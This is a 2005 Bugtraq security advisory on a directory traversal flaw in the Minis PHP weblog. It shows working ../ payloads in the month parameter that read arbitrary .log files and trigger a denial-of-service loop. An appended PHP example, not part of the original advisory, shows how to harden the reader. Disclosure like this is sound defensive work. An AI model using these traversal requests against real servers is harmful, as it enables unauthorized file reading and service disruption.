List: bugtraq
Subject: Minis directory traversal vulnerability
From: Madelman <madelman () iname ! com>
Date: 2005-01-16 18:04:16
Message-ID: 41EAACA0.1040700 () iname ! com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Title: Minis directory traversal vulnerability
Vulnerability discovery: Madelman <madelman AT iname.com>
Date: 31/12/2004
Severity: Moderate
Summary:
- --------
(from vendor site: http://minis.sourceforge.net/)
Minis is a tiny, PHP-powered, text-file based weblogging system.
It is easily configured for normal use and it doesn't require any
databases, such as MySQL. Also, with some PHP-knowledge you'll be
able to configure Minis endlessly.
Minis doesn't check the month parameter, which allows reading any file with a .log extension.
This vulnerability has been tested with Minis 0.2.1.
Details:
- --------
If we want to read /var/log/XFree86.0.log:
REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XFree86.0
RETURNS: (looking at source of HTML)
[...]
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=This is a pre-release version of XFree86, and is not supported in any
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=way. Bugs may be reported to XFree86@XFree86.Org and patches submitted
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=to fixes@XFree86.Org. Before reporting bugs in pre-release versions,
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=please check the latest version in the XFree86 CVS repository
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=(http://www.XFree86.Org/cvs).
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=XFree86 Version 4.3.0.1 (Debian 4.3.0.dfsg.1-4 20040529113443 root@cyberhq.internal.cyberhqz.com)
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Release Date: 15 August 2003
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=X Protocol Version 11, Revision 0, Release 6.6
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build Operating System: Linux 2.6.6-rc3-bk9 i686 [ELF]
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build Date: 29 May 2004
[...]
If we try to read a file that doesn't exist (in this example /var/log/XFree86.log), Minis returns "No such month":
REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XFree86
RESPONSE:
No such month.
If we try to read a file the webserver doesn't have authorization to read, Minis enters an endless loop, which could cause the server to spend an incredible amount of bandwidth or even cause a DoS:
REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/auth
RETURNS:
Warning: fopen(blog/../../../../../../../../var/log/auth.log): failed to open stream: Permission denied in /var/www/minis/minis.php on line 109
../../../../../../../../var/log/auth
Warning: feof(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 111
Warning: fgets(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 112
Warning: feof(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 111
Warning: fgets(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 112
[...]
Timeline
- --------
31/12/2004 - Vulnerability found
31/12/2004 - Vendor contacted
16/01/2005 - Vendor hasn't replied. Advisory released
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
iD8DBQFB6qyg3RWooxY20cIRAg4cAJ41z36lEK44et5nx4V6tspofoo+zACgnLr6
nUEj8oDBySiBN2ScbMinO7s=
=sSF1
-----END PGP SIGNATURE-----
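
Added example (not part of the original advisory and not Minis code): one way to harden a blog/<month>.log reader against both problems described above, the traversal through the month parameter and the feof()/fgets() loop that never ends after a failed fopen(). BLOG_DIR, read_month_entries() and the allowed month-name pattern are assumptions; only the blog/<month>.log path layout is taken from the warning output in the advisory.

```php
<?php
// Added example, not Minis code. BLOG_DIR and read_month_entries() are hypothetical names.
const BLOG_DIR = __DIR__ . '/blog';

/**
 * Return the lines of blog/<month>.log, or null if the name is rejected
 * or the file cannot be opened.
 */
function read_month_entries(string $month, string $blogDir = BLOG_DIR): ?array
{
    // 1. Allow-list the name: no dots, slashes, backslashes or NUL bytes.
    //    Assumed naming scheme; tighten it to the real one (e.g. digits only).
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $month)) {
        return null;
    }

    // 2. Resolve symlinks and confirm the file is still inside the blog directory.
    $base = realpath($blogDir);
    $path = realpath($blogDir . '/' . $month . '.log');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }

    // 3. Check fopen() before looping: feof() on a failed handle does not
    //    return true, which is the endless loop shown in the advisory.
    $fp = @fopen($path, 'r');
    if ($fp === false) {
        return null;
    }

    $lines = [];
    while (($line = fgets($fp)) !== false) {   // stops on EOF and on read errors
        $lines[] = rtrim($line, "\r\n");
    }
    fclose($fp);
    return $lines;
}

// Constructed inputs: a plausible month name, then the two patterns from the advisory.
foreach (['2005-01', '../../../../../../../../var/log/XFree86.0', '../../../../../../../../var/log/auth'] as $m) {
    $entries = read_month_entries($m);
    echo $m, ' => ', $entries === null ? 'No such month.' : count($entries) . ' entries', PHP_EOL;
}
```

Returning the same "No such month." result for rejected names, missing files and unreadable files also avoids leaking the full path and line numbers that the PHP warnings above disclose.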